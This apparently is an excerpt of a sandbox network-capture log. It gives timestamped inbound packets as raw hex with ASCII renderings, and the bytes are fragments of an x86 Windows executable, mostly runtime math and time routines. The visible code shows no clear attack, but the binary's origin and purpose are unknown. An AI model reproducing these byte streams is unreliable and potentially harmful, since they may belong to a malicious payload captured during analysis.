2023-11-18 09:02:39 UTC	831	IN	Data Raw: 3b f7 74 69 85 f6 74 04 8b c6 eb 63 8b 75 10 3b 75 14 74 1a ff 36 e8 59 00 00 00 59 85 c0 75 2f 83 c6 04 3b 75 14 75 ec 8b 15 04 10 14 10 33 c0 85 c0 74 29 ff 75 0c 50 ff 15 f8 80 11 10 8b f0 85 f6 74 13 56 e8 68 9d ff ff 59 87 03 eb b9 8b 15 04 10 14 10 eb d9 8b 15 04 10 14 10 8b c2 6a 20 83 e0 1f 59 2b c8 d3 cf 33 fa 87 3b 33 c0 5f 5e 5b 5d c3 8b ff 55 8b ec 8b 45 08 57 8d 3c 85 70 3c 14 10 8b 0f 85 c9 74 0b 8d 41 01 f7 d8 1b c0 23 c1 eb 57 53 8b 1c 85 50 92 11 10 56 68 00 08 00 00 6a 00 53 ff 15 b4 81 11 10 8b f0 85 f6 75 27 ff 15 ac 80 11 10 83 f8 57 75 0d 56 56 53 ff 15 b4 81 11 10 8b f0 eb 02 33 f6 85 f6 75 09 83 c8 ff 87 07 33 c0 eb 11 8b c6 87 07 85 c0 74 07 56 ff 15 20 81 11 10 8b c6 5e 5b 5f 5d c3 8b ff 55 8b ec 51 a1 04 10 14 10 33 c5 89 45 fc Data Ascii: ;titcu;ut6YYu/;uu3t)uPtVhYj Y+3;3_^[]UEW<p<tA#WSPVhjSu'WuVVS3u3tV ^[_]UQ3E
2023-11-18 09:02:39 UTC	832	IN	Data Raw: 70 3c 14 10 83 3e 00 74 10 83 3e ff 74 08 ff 36 ff 15 20 81 11 10 83 26 00 83 c6 04 81 fe c0 3c 14 10 75 e0 5e b0 01 5d c3 8b ff 55 8b ec 51 e8 e2 f8 ff ff 8b 48 4c 89 4d fc 8d 4d fc 51 50 e8 9e 03 00 00 8b 45 fc 59 59 8b 00 8b e5 5d c3 8b ff 55 8b ec 83 ec 10 ff 75 0c 8d 4d f0 e8 39 a4 ff ff 8b 45 f4 0f b6 4d 08 8b 00 0f b7 04 48 25 00 80 00 00 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b e5 5d c3 8b ff 55 8b ec 83 ec 24 a1 04 10 14 10 33 c5 89 45 fc 53 ff 75 10 8b 5d 08 8d 4d e0 e8 f2 a3 ff ff 8d 43 01 3d 00 01 00 00 77 0b 8b 45 e4 8b 00 0f b7 04 58 eb 7a 8b c3 8d 4d e4 c1 f8 08 89 45 dc 51 0f b6 c0 50 e8 7c ff ff ff 59 59 85 c0 74 13 8b 45 dc 88 45 f0 33 c0 6a 02 88 5d f1 88 45 f2 59 eb 0b 33 c0 88 5d f0 33 c9 88 45 f1 41 89 45 f4 66 89 45 f8 8b Data Ascii: p<>t>t6 &<u^]UQHLMMQPEYY]UuM9EMH%}tMP]U$3ESu]MC=wEXzMEQP\|YYtEE3j]EY3]3EAEfE
2023-11-18 09:02:39 UTC	833	IN	Data Raw: ef ff ff 6a 16 58 5d c3 a1 4c 3d 14 10 89 01 33 c0 5d c3 8b ff 55 8b ec 8b 45 08 56 be 90 01 00 00 57 8d 48 ff 05 2b 01 00 00 99 f7 fe 6a 64 8b f0 8b c1 99 5f f7 ff 5f 2b f0 8b c1 99 83 e2 03 03 c2 c1 f8 02 83 c0 ef 03 c6 5e 5d c3 8b ff 55 8b ec 8b 4d 08 8b c1 25 03 00 00 80 79 05 48 83 c8 fc 40 75 12 56 6a 64 8b c1 5e 99 f7 fe 5e 85 d2 74 04 b0 01 5d c3 8d 81 6c 07 00 00 b9 90 01 00 00 99 f7 f9 f7 da 1a d2 8d 42 01 5d c3 8b ff 55 8b ec 83 ec 0c 56 8b 75 08 85 f6 75 16 e8 3f b9 ff ff 6a 16 5e 89 30 e8 2f ef ff ff 8b c6 e9 22 01 00 00 57 6a 09 83 c8 ff 8b fe 59 f3 ab 8b 7d 0c 85 ff 75 11 e8 17 b9 ff ff 6a 16 5e 89 30 e8 07 ef ff ff eb 33 8b 4f 04 8b 07 89 45 f4 89 4d f8 83 f9 ff 7f 09 7c 17 3d 40 57 ff ff 72 10 6a 07 5a 3b ca 7c 1a 7f 07 3d cf 26 41 93 76 Data Ascii: jX]L=3]UEVWH+jd__+^]UM%yH@uVjd^^t]lB]UVuu?j^0/"WjY}uj^03OEM\|=@WrjZ;\|=&Av
2023-11-18 09:02:39 UTC	835	IN	Data Raw: 8d 45 f8 50 89 35 c8 11 14 10 e8 53 fa ff ff 59 85 c0 75 44 69 45 f8 e8 03 00 00 8b 0d cc 11 14 10 03 c8 89 0d cc 11 14 10 79 0e 81 c1 00 5c 26 05 ff 0d c8 11 14 10 eb 11 b8 00 5c 26 05 3b c8 7c 0e 2b c8 ff 05 c8 11 14 10 89 0d cc 11 14 10 89 3d c4 11 14 10 eb 9d 6a 00 6a 00 6a 00 6a 00 6a 00 e8 2c ea ff ff cc 8b ff 55 8b ec 83 ec 0c 53 56 e8 b9 f9 ff ff 83 65 fc 00 8b d8 83 65 f4 00 8d 45 fc 50 89 5d f8 e8 01 fa ff ff 59 85 c0 0f 85 9a 01 00 00 8d 45 f4 50 e8 97 f9 ff ff 59 85 c0 0f 85 88 01 00 00 8b 15 5c 3d 14 10 8b 75 08 85 d2 74 34 8b ca 8b c6 8a 18 3a 19 75 1a 84 db 74 12 8a 58 01 3a 59 01 75 0e 83 c0 02 83 c1 02 84 db 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 0f 84 44 01 00 00 8b 5d f8 52 e8 c1 db ff ff 59 8b ce 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d Data Ascii: EP5SYuDiEy\&\&;\|+=jjjjj,USVeeEP]YEPY\=ut4:utX:Yuu3D]RYQAu+
2023-11-18 09:02:39 UTC	836	IN	Data Raw: 74 5b d9 c0 e8 93 00 00 00 d9 c9 e8 9e 00 00 00 de e9 de f1 c3 c6 85 70 ff ff ff ff e8 4a 00 00 00 0a db 74 33 e8 72 00 00 00 d9 e8 d9 e0 d9 c9 d9 fd e9 84 dc ff ff dd d8 db 2d b0 a9 11 10 e9 6c dd ff ff dd d8 db 2d b0 a9 11 10 c3 c3 e8 31 2c 00 00 e9 58 dd ff ff e9 27 2c 00 00 c6 85 70 ff ff ff 08 e8 74 dc ff ff eb e8 d9 ea de c9 33 db e8 2b 2c 00 00 f6 d3 f6 85 61 ff ff ff 01 74 09 e8 28 00 00 00 d9 c9 dd d8 f6 c2 40 75 08 f6 d7 d9 e8 de c1 d9 fd e9 1f dc ff ff e8 0d 00 00 00 de c1 0a ff 75 06 d9 e8 dc c1 de c1 c3 d9 c0 d9 e8 0a ff 75 06 d8 c1 d9 e0 d9 c9 de f1 c3 cc cc cc cc 55 8b ec 81 c4 30 fd ff ff 53 9b d9 bd 5c ff ff ff 9b 50 51 52 e8 b7 50 00 00 3c 00 5a 59 58 75 14 e8 41 db ff ff 80 8d 38 fd ff ff 03 e8 9d 00 00 00 5b c9 c3 d9 c9 dd 95 7a ff ff Data Ascii: t[pJt3r-l-1,X',pt3+,at(@uuuU0S\PQRP<ZYXuA8[z
2023-11-18 09:02:39 UTC	837	IN	Data Raw: f0 ef 11 10 f2 0f 10 ce f2 0f 59 f6 25 80 00 00 00 c1 e0 08 f2 0f 59 c6 f2 0f 59 ce 83 ec 10 f2 0f 59 e9 f2 0f 59 ce f2 0f 58 c2 66 0f ef f6 f2 0f 59 c1 f2 0f 58 eb 66 0f c4 f0 03 f2 0f 58 c5 66 0f 70 db ee f2 0f 5c c4 f2 0f 58 c3 66 0f 56 c6 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 05 bb 3b 00 00 3d 00 38 00 00 73 6a 66 0f 14 ff 66 0f 28 35 80 a5 11 10 66 0f 14 cf 66 0f 28 15 90 a5 11 10 66 0f 28 25 a0 a5 11 10 66 0f 59 ff 83 ec 10 66 0f 59 cf 66 0f 59 f7 66 0f 59 ff f2 0f 10 d9 f2 0f 59 c9 66 0f 58 f2 66 0f 59 e7 f2 0f 59 cb 66 0f 58 f4 66 0f 59 ce 66 0f 70 d1 ee f2 0f 58 ca f2 0f 58 c1 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 2d fe 3b 00 00 83 f8 02 0f 83 4f 01 00 00 f2 0f 59 c9 f2 0f 5c d9 f2 0f 51 db 66 0f c5 c7 03 66 0f 54 3d 50 a5 11 10 66 0f 70 Data Ascii: Y%YYYYXfYXfXfp\XfVfD$D$;=8sjff(5ff(f(%fYfYfYfYYfXfYYfXfYfpXXfD$D$-;OY\QffT=Pfp
2023-11-18 09:02:39 UTC	839	IN	Data Raw: 00 83 c4 0c 85 f6 5e 74 0d e8 70 a4 ff ff c7 00 21 00 00 00 eb 10 f6 c3 1c 74 0b e8 5e a4 ff ff c7 00 22 00 00 00 5b 5d c3 8b ff 55 8b ec 51 51 8d 45 08 50 e8 ef fe ff ff 98 59 83 e8 00 74 78 83 e8 01 74 05 83 e8 01 eb 09 b8 00 80 00 00 66 85 45 0e 74 63 dd 05 98 ce 13 10 dd 45 08 d8 d1 df e0 f6 c4 05 7a 14 dd d8 6a 01 dd d8 e8 1a ff ff ff dd 05 38 a6 11 10 59 eb 40 dd e1 df e0 dd d9 f6 c4 44 7a 14 6a 04 dd d8 e8 fd fe ff ff dd 05 30 a6 11 10 59 d9 e0 eb 21 d9 e8 de c1 dd 55 f8 e8 2b 09 00 00 dd 45 f8 d9 c0 d9 e8 de e9 dc 65 08 de f1 de e9 eb 03 dd 45 08 8b e5 5d c3 cc cc 55 8b ec 83 ec 08 83 e4 f0 dd 1c 24 f3 0f 7e 04 24 e8 08 00 00 00 c9 c3 66 0f 12 44 24 04 66 0f 12 25 20 a7 11 10 66 0f 12 1d 30 a7 11 10 66 0f 57 ed 66 0f 12 15 28 a7 11 10 f2 0f 10 c8 Data Ascii: ^tp!t^"[]UQQEPYtxtfEtcEzj8Y@Dzj0Y!U+EeE]U$~$fD$f% f0fWf(
2023-11-18 09:02:39 UTC	840	IN	Data Raw: c1 ba 3a 00 00 00 83 ec 1c 66 0f 13 44 24 10 89 54 24 0c 8b d4 83 c2 10 89 54 24 08 83 c2 10 89 54 24 04 89 14 24 e8 da 41 00 00 66 0f 12 44 24 10 83 c4 1c 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 66 0f c5 d7 01 c1 ea 0f f7 da 66 0f 6e fa 66 0f 70 ff 00 66 0f 12 15 80 a6 11 10 66 0f 12 05 88 a6 11 10 66 0f 54 d7 66 0f 54 c7 f2 0f 58 c2 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 66 0f 12 15 60 a6 11 10 66 0f 12 05 68 a6 11 10 f2 0f 58 c2 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 66 0f 57 f6 f2 0f 58 c6 ba f0 03 00 00 e9 4a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 83 e4 f0 dd 1c Data Ascii: :fD$T$T$T$$AfD$fD$D$ffnfpfffTfTXfD$D$f`fhXfD$D$fWXJU
2023-11-18 09:02:39 UTC	857	IN	Data Raw: 24 f3 0f 7e 04 24 e8 08 00 00 00 c9 c3 66 0f 12 44 24 04 66 0f c5 c0 03 66 25 ff 7f 66 2d 20 38 66 3d a8 08 0f 87 d7 01 00 00 66 0f 14 c0 66 0f 28 0d 70 a7 11 10 66 0f 59 c8 f2 0f 2d d1 66 0f 28 15 80 a7 11 10 66 0f 58 ca 66 0f 28 1d 90 a7 11 10 66 0f 5c ca 66 0f 12 2d c0 a7 11 10 81 c2 00 29 07 00 66 0f 28 25 a0 a7 11 10 66 0f 59 d9 83 e2 1f f2 0f 59 e9 8b ca 66 0f 59 e1 d1 e1 66 0f 5c c3 66 0f 59 0d b0 a7 11 10 03 d1 c1 e1 02 03 d1 f2 0f 58 e8 66 0f 28 d0 66 0f 5c c4 66 0f 12 35 c8 a7 11 10 c1 e2 04 8d 05 f0 06 12 10 66 0f 54 2d d0 a7 11 10 66 0f 28 d8 03 c2 66 0f 5c d0 66 0f 15 c0 f2 0f 5e f5 66 0f 5c d4 66 0f 28 78 10 f2 0f 5c dd 66 0f 59 f8 66 0f 5c d1 66 0f 28 48 30 66 0f 59 c8 66 0f 28 60 60 66 0f 59 e0 f2 0f 58 d3 66 0f 28 d8 66 0f 59 c0 66 0f 58 Data Ascii: $~$fD$ff%f- 8f=ff(pfY-f(fXf(f\f-)f(%fYYfYf\fYXf(f\f5fT-f(f\f^f\f(x\fYf\f(H0fYf(``fYXf(fYfX
2023-11-18 09:02:39 UTC	858	IN	Data Raw: 00 8d 45 f4 50 0f b6 06 50 e8 ff d9 ff ff 59 59 85 c0 74 40 8b 7d f4 83 7f 04 01 7e 27 3b 5f 04 7c 25 33 c0 39 45 08 0f 95 c0 50 ff 75 08 ff 77 04 56 6a 09 ff 77 08 ff 15 98 80 11 10 8b 7d f4 85 c0 75 0b 3b 5f 04 72 2e 80 7e 01 00 74 28 8b 7f 04 eb 31 33 c0 39 45 08 0f 95 c0 33 ff 50 ff 75 08 8b 45 f4 47 57 56 6a 09 ff 70 08 ff 15 98 80 11 10 85 c0 75 0e e8 7d 98 ff ff 83 cf ff c7 00 2a 00 00 00 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b c7 5f e9 31 ff ff ff 8b ff 55 8b ec 6a 00 ff 75 10 ff 75 0c ff 75 08 e8 f1 fe ff ff 83 c4 10 5d c3 8b ff 55 8b ec 83 ec 14 53 8b 5d 0c 57 8b 7d 10 85 db 75 12 85 ff 74 0e 8b 45 08 85 c0 74 03 83 20 00 33 c0 eb 7a 8b 45 08 85 c0 74 03 83 08 ff 56 81 ff ff ff ff 7f 76 11 e8 04 98 ff ff 6a 16 5e 89 30 e8 f4 cd ff ff Data Ascii: EPPYYt@}~';_\|%39EPuwVjw}u;_r.~t(139E3PuEGWVjpu}*}tMP_1Ujuuu]US]W}utEt 3zEtVvj^0
2023-11-18 09:02:39 UTC	860	IN	Data Raw: 8a c2 5d c3 8b ff 55 8b ec 83 ec 30 53 56 57 8b 7d 1c 33 db 85 ff 79 02 8b fb 8b 75 0c 8d 4d d0 ff 75 28 88 1e e8 d6 78 ff ff 8d 47 0b 39 45 10 77 14 e8 69 93 ff ff 6a 22 5f 89 38 e8 59 c9 ff ff e9 a8 02 00 00 8b 55 08 8b 02 8b 4a 04 89 45 e0 8b c1 c1 e8 14 25 ff 07 00 00 3d ff 07 00 00 75 52 3b db 75 4e 53 ff 75 24 53 57 ff 75 18 ff 75 14 ff 75 10 56 52 e8 8b 02 00 00 8b f8 83 c4 24 85 ff 74 07 88 1e e9 62 02 00 00 6a 65 56 e8 5f 64 ff ff 59 59 85 c0 74 13 38 5d 20 0f Data Ascii: ]U0SVW}3yuMu(xG9Ewij"_8YUJE%=uR;uNSu$SWuuuVR$tbjeV_dYYt8]
2023-11-18 09:02:39 UTC	860	IN	Data Raw: 94 c1 fe c9 80 e1 e0 80 c1 70 88 08 88 58 03 8b fb e9 3a 02 00 00 81 e1 00 00 00 80 8b c3 0b c1 74 04 c6 06 2d 46 8b 4a 04 33 db 38 5d 20 6a 30 0f 94 c3 c7 45 f4 ff 03 00 00 4b 33 c0 83 e3 e0 81 e1 00 00 f0 7f 83 c3 27 0b c1 89 5d e4 58 75 1f 88 06 46 8b 42 04 8b 0a 25 ff ff 0f 00 0b c8 75 05 21 4d f4 eb 0d c7 45 f4 fe 03 00 00 eb 04 c6 06 31 46 8b ce 46 89 4d e8 85 ff 75 05 c6 01 00 eb 0f 8b 45 d4 8b 80 88 00 00 00 8b 00 8a 00 88 01 8b 42 04 25 ff ff 0f 00 89 45 f0 77 09 83 3a 00 0f 86 c5 00 00 00 83 65 fc 00 b9 00 00 0f 00 6a 30 58 89 45 f8 89 4d f0 85 ff 7e 53 8b 02 8b 52 04 23 45 fc 23 d1 8b 4d f8 81 e2 ff ff 0f 00 0f bf c9 e8 bc 93 00 00 6a 30 59 66 03 c1 0f b7 c0 83 f8 39 76 02 03 c3 8b 4d f0 8b 55 08 88 06 46 8b 45 fc 0f ac c8 04 89 45 fc 8b 45 f8 Data Ascii: pX:t-FJ38] j0EK3']XuFB%u!ME1FFMuEB%Ew:ej0XEM~SR#E#Mj0Yf9vMUFEEE
2023-11-18 09:02:39 UTC	861	IN	Data Raw: 10 8b 80 88 00 00 00 8b 00 8a 00 88 06 46 8b 45 14 8b 48 04 85 c9 79 29 80 7d 18 00 75 08 8b c1 f7 d8 3b c7 7d 04 8b f9 f7 df 57 56 ff 75 0c 53 e8 e5 01 00 00 57 6a 30 56 e8 2e 62 ff ff 83 c4 1c 80 7d fc 00 5f 5e 5b 74 0a 8b 45 f0 83 a0 50 03 00 00 fd 33 c0 8b e5 5d c3 8b ff 55 8b ec 83 ec 10 53 56 57 ff 75 18 33 c0 8d 7d f0 ff 75 14 ab ab ab 8d 45 f0 8b 7d 1c 50 8b 45 08 57 ff 70 04 ff 30 e8 62 4a 00 00 8b 45 f4 33 c9 8b 5d 0c 83 c4 18 83 7d f0 2d 0f 94 c1 48 89 45 fc 83 c8 ff 8d 34 19 39 45 10 74 05 8b 45 10 2b c1 8d 4d f0 51 57 50 56 e8 92 44 00 00 83 c4 10 85 c0 74 05 c6 03 00 eb 55 8b 45 f4 48 39 45 fc 0f 9c c1 83 f8 fc 7c 2a 3b c7 7d 26 84 c9 74 0a 8a 06 46 84 c0 75 f9 88 46 fe ff 75 28 8d 45 f0 6a 01 50 57 ff 75 10 53 e8 89 fe ff ff 83 c4 18 eb 1c Data Ascii: FEHy)}u;}WVuSWj0V.b}_^[tEP3]USVWu3}uE}PEWp0bJE3]}-HE49EtE+MQWPVDtUEH9E\|*;}&tFuFu(EjPWuS
2023-11-18 09:02:39 UTC	863	IN	Data Raw: 10 59 3b f0 7e 02 8b f0 57 33 ff 85 f6 74 56 8b 45 fc 8b 08 83 f9 ff 74 40 83 f9 fe 74 3b 8a 13 f6 c2 01 74 34 f6 c2 08 75 0b 51 ff 15 e8 81 11 10 85 c0 74 21 8b c7 8b cf 83 e0 3f c1 f9 06 6b d0 30 8b 45 fc 03 14 8d 30 3e 14 10 8b 00 89 42 18 8a 03 88 42 28 8b 45 fc 47 83 c0 04 43 89 45 fc 3b fe 75 ad 5f 5e 5b 8b e5 5d c3 8b ff 53 56 57 33 ff 8b c7 8b cf 83 e0 3f c1 f9 06 6b f0 30 03 34 8d 30 3e 14 10 83 7e 18 ff 74 0c 83 7e 18 fe 74 06 80 4e 28 80 eb 7b 8b c7 c6 46 28 81 83 e8 00 74 10 83 e8 01 74 07 6a f4 83 e8 01 eb 06 6a f5 eb 02 6a f6 58 50 ff 15 e4 81 11 10 8b d8 83 fb ff 74 0d 85 db 74 09 53 ff 15 e8 81 11 10 eb 02 33 c0 85 c0 74 1e 25 ff 00 00 00 89 5e 18 83 f8 02 75 06 80 4e 28 40 eb 29 83 f8 03 75 24 80 4e 28 08 eb 1e 80 4e 28 40 c7 46 18 fe ff Data Ascii: Y;~W3tVEt@t;t4uQt!?k0E0>BB(EGCE;u_^[]SVW3?k040>~t~tN({F(ttjjjXPttS3t%^uN(@)u$N(N(@F
2023-11-18 09:02:39 UTC	864	IN	Data Raw: f8 01 75 ed 0a ed 74 e9 d9 e0 eb e5 dd d8 e9 7d b0 ff ff dd d8 e9 25 b1 ff ff 58 d9 e4 9b dd bd 60 ff ff ff 9b f6 85 61 ff ff ff 01 75 0f dd d8 db 2d b0 a9 11 10 0a ed 74 02 d9 e0 c3 c6 85 70 ff ff ff 04 e9 47 b0 ff ff dd d8 dd d8 db 2d b0 a9 11 10 c6 85 70 ff ff ff 03 c3 0a c9 75 af dd d8 db 2d b0 a9 11 10 c3 d9 c0 d9 e1 db 2d ce a9 11 10 de d9 9b dd bd 60 ff ff ff 9b f6 85 61 ff ff ff 41 75 95 d9 c0 d9 fc d9 e4 9b dd bd 60 ff ff ff 9b 8a 95 61 ff ff ff d9 c9 d8 e1 d9 e4 9b dd bd 60 ff ff ff d9 e1 d9 f0 c3 d9 c0 d9 fc d8 d9 9b df e0 9e 75 1a d9 c0 dc 0d e2 a9 11 10 d9 c0 d9 fc de d9 9b df e0 9e 74 0d b8 01 00 00 00 c3 b8 00 00 00 00 eb f8 b8 02 00 00 00 eb f1 56 83 ec 74 8b f4 56 83 ec 08 dd 1c 24 83 ec 08 dd 1c 24 9b dd 76 08 e8 a9 0b 00 00 83 c4 14 dd Data Ascii: ut}%X`au-tpG-pu--`aAu`a`utVtV$$v
2023-11-18 09:02:39 UTC	865	IN	Data Raw: 25 ff 00 00 00 b9 01 ff 03 00 03 c8 81 e1 00 00 04 00 83 fa 10 72 5e ba 7f fe 0b 00 66 0f 12 1d 20 aa 11 10 66 0f 12 15 30 aa 11 10 e9 26 fc ff ff 66 0f 12 7c 24 04 66 0f 12 64 24 04 66 0f 7e fa 66 0f 73 d7 20 66 0f 7e f8 8b c8 25 ff ff ff 7f 3d 00 00 f0 7f 0f 82 72 02 00 00 0f 87 de 01 00 00 83 fa 00 0f 87 d5 01 00 00 e9 5e 02 00 00 b9 00 00 00 00 66 0f 57 c0 b8 f0 43 00 00 66 0f c4 c0 03 66 0f 12 3d 20 aa 11 10 66 0f 12 15 30 aa 11 10 f2 0f 59 c4 66 0f 7e e2 66 0f 73 d4 20 66 0f 7e e0 83 fa 00 74 52 66 0f 54 f8 f2 0f 10 e0 66 0f 54 05 40 aa 11 10 66 0f 73 d0 2c 66 0f c5 c0 00 66 0f 56 fa 25 ff 00 00 00 83 c0 01 25 fe 01 00 00 f2 0f 59 3c 85 c0 2b 12 10 66 0f 12 2c 85 c0 2b 12 10 03 c0 66 0f 28 34 85 d0 2f 12 10 ba 7f 3e 04 00 e9 5c fb ff ff 8b d0 81 e2 Data Ascii: %r^f f0&f\|$fd$f~fs f~%=r^fWCff= f0Yf~fs f~tRfTfT@fs,ffV%%Y<+f,+f(4/>\
2023-11-18 09:02:39 UTC	867	IN	Data Raw: 66 0f c4 f7 03 5f f2 0f 5c d1 f2 0f 58 c2 f2 0f 58 c3 83 fe 00 7f 4e 5e f2 0f 59 c7 f2 0f 59 cf f2 0f 58 c1 f2 0f 59 f0 f2 0f 58 c6 66 0f c5 c0 03 25 f0 7f 00 00 ba 18 00 00 00 3d f0 7f 00 00 0f 84 10 fe ff ff ba 19 00 00 00 83 f8 00 0f 84 02 fe ff ff 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 5e f2 0f 58 c1 f2 0f 59 c7 f2 0f 59 f0 f2 0f 58 c6 66 0f c5 c0 03 25 f0 7f 00 00 ba 18 00 00 00 3d f0 7f 00 00 0f 84 c6 fd ff ff ba 19 00 00 00 83 f8 00 0f 84 b8 fd ff ff 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 66 0f 12 05 b8 aa 11 10 66 0f 6e c9 f2 0f 59 c0 66 0f 73 f1 2d 66 0f 56 c1 ba 19 00 00 00 e9 84 fd ff ff ba 18 00 00 00 83 f9 00 74 15 66 0f 12 05 a8 aa 11 10 f2 0f 59 05 b0 aa 11 10 e9 65 fd ff ff 66 0f 12 05 b0 aa 11 10 f2 0f 59 c0 e9 54 Data Ascii: f_\XXN^YYXYXf%=fD$D$^XYYXf%=fD$D$ffnYfs-fVtfYefYT
2023-11-18 09:02:39 UTC	871	IN	Data Raw: 45 e0 8d 4e 0c 6a 06 8d 90 8c 12 14 10 5f 66 8b 02 8d 52 02 66 89 01 8d 49 02 83 ef 01 75 ef 56 e8 ce fa ff ff 59 33 c0 5f 8b 4d fc 5e 33 cd 5b e8 7a 26 ff ff 8b e5 5d c3 8b ff 55 8b ec 83 ec 10 56 ff 75 08 8d 4d f0 e8 d3 4c ff ff 0f b6 75 0c 8b 45 f8 8a 4d 14 84 4c 30 19 75 1b 33 d2 39 55 10 74 0e 8b 45 f4 8b 00 0f b7 04 70 23 45 10 eb 02 8b c2 85 c0 74 03 33 d2 42 80 7d fc 00 5e 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b c2 8b e5 5d c3 8b ff 55 8b ec 6a 04 6a 00 ff 75 08 6a 00 e8 94 ff ff ff 83 c4 10 5d c3 ff 15 04 82 11 10 a3 a0 41 14 10 ff 15 08 82 11 10 a3 a4 41 14 10 b0 01 c3 8b ff 55 8b ec 8b 55 08 57 33 ff 66 39 3a 74 21 56 8b ca 8d 71 02 66 8b 01 83 c1 02 66 3b c7 75 f5 2b ce d1 f9 8d 14 4a 83 c2 02 66 39 3a 75 e1 5e 8d 42 02 5f 5d c3 8b ff 55 8b ec Data Ascii: ENj_fRfIuVY3_M^3[z&]UVuMLuEML0u39UtEp#Et3B}^tMP]Ujjuj]AAUUW3f9:t!Vqff;u+Jf9:u^B_]U
2023-11-18 09:02:39 UTC	875	IN	Data Raw: 5a ff ff ff 59 5e 5d c3 6a 0c 68 38 e0 13 10 e8 ea 20 ff ff 83 65 e4 00 e8 f9 90 ff ff 8b f8 8b 0d a4 17 14 10 85 8f 50 03 00 00 74 07 8b 77 4c 85 f6 75 43 6a 04 e8 e1 e2 ff ff 59 83 65 fc 00 ff 35 48 3d 14 10 8d 47 4c 50 e8 30 00 00 00 59 59 8b f0 89 75 e4 c7 45 fc fe ff ff ff e8 0c 00 00 00 85 f6 75 11 e8 d9 7f ff ff 8b 75 e4 6a 04 e8 ef e2 ff ff 59 c3 8b c6 e8 c6 20 ff ff c3 8b ff 55 8b ec 56 8b 75 0c 57 85 f6 74 3c 8b 45 08 85 c0 74 35 8b 38 3b fe 75 04 8b c6 eb 2d 56 89 30 e8 98 fc ff ff 59 85 ff 74 ef 57 e8 d6 fe ff ff 83 7f 0c 00 59 75 e2 81 ff 68 10 14 10 74 da 57 e8 f5 fc ff ff 59 eb d1 33 c0 5f 5e 5d c3 8b ff 55 8b ec 83 ec 10 53 56 57 33 ff bb e3 00 00 00 89 7d f4 89 5d f8 8d 04 3b c7 45 fc 55 00 00 00 99 2b c2 8b c8 d1 f9 6a 41 5f 89 4d f0 8b Data Ascii: ZY^]jh8 ePtwLuCjYe5H=GLP0YYuEuujY UVuWt<Et58;u-V0YtWYuhtWY3_^]USVW3}];EU+jA_M
2023-11-18 09:02:39 UTC	876	IN	Data Raw: 17 14 10 74 07 50 e8 1e 7b ff ff 59 8b 46 08 3b 05 b8 17 14 10 74 07 50 e8 0c 7b ff ff 59 8b 46 30 3b 05 e0 17 14 10 74 07 50 e8 fa 7a ff ff 59 8b 46 34 3b 05 e4 17 14 10 74 07 50 e8 e8 7a ff ff 59 5e 5d c3 8b ff 55 8b ec 8b 45 0c 53 56 8b 75 08 57 33 ff 8d 04 86 8b c8 2b ce 83 c1 03 c1 e9 02 3b c6 1b db f7 d3 23 d9 74 10 ff 36 e8 b6 7a ff ff 47 8d 76 04 59 3b fb 75 f0 5f 5e 5b 5d c3 8b ff 55 8b ec 56 8b 75 08 85 f6 0f 84 d0 00 00 00 6a 07 56 e8 ab ff ff ff 8d 46 1c 6a 07 50 e8 a0 ff ff ff 8d 46 38 6a 0c 50 e8 95 ff ff ff 8d 46 68 6a 0c 50 e8 8a ff ff ff 8d 86 98 00 00 00 6a 02 50 e8 7c ff ff ff ff b6 a0 00 00 00 e8 55 7a ff ff ff b6 a4 00 00 00 e8 4a 7a ff ff ff b6 a8 00 00 00 e8 3f 7a ff ff 8d 86 b4 00 00 00 6a 07 50 e8 4d ff ff ff 8d 86 d0 00 00 00 6a Data Ascii: tP{YF;tP{YF0;tPzYF4;tPzY^]UESVuW3+;#t6zGvY;u_^[]UVujVFjPF8jPFhjPjP\|UzJz?zjPMj
2023-11-18 09:02:39 UTC	883	IN	Data Raw: 0b c1 b0 2d 75 02 04 f3 0f be c0 8b ce 89 07 81 e1 00 00 f0 7f 33 c0 89 5f 08 0b c1 8b 7d 08 75 22 8b ce 8b c7 81 e1 ff ff 0f 00 0b c1 75 14 8b 85 80 f8 ff ff 68 90 9d 12 10 83 60 04 00 e9 d3 12 00 00 8d 45 08 50 e8 0b ae ff ff 59 85 c0 74 0d 8b 8d 80 f8 ff ff c7 41 04 01 00 00 00 83 e8 01 0f 84 aa 12 00 00 83 e8 01 0f 84 9a 12 00 00 83 e8 01 0f 84 8a 12 00 00 83 e8 01 0f 84 7a 12 00 00 8b 45 10 81 e6 ff ff ff 7f 83 a5 7c f8 ff ff 00 40 89 7d 08 89 75 0c dd 45 08 dd 95 98 f8 ff ff 8b bd 9c f8 ff ff 8b cf 89 85 88 f8 ff ff c1 e9 14 8b c1 25 ff 07 00 00 83 c8 00 75 06 b2 01 33 f6 eb 09 32 d2 be 00 00 10 00 33 c0 8b 9d 98 f8 ff ff 81 e7 ff ff 0f 00 03 d8 13 fe 33 c0 84 d2 0f 95 c0 81 e1 ff 07 00 00 40 8d b1 cc fb ff ff 03 f0 89 b5 b4 f8 ff ff e8 51 25 00 00 Data Ascii: -u3_}u"uh`EPYtAzE\|@}uE%u3233@Q%
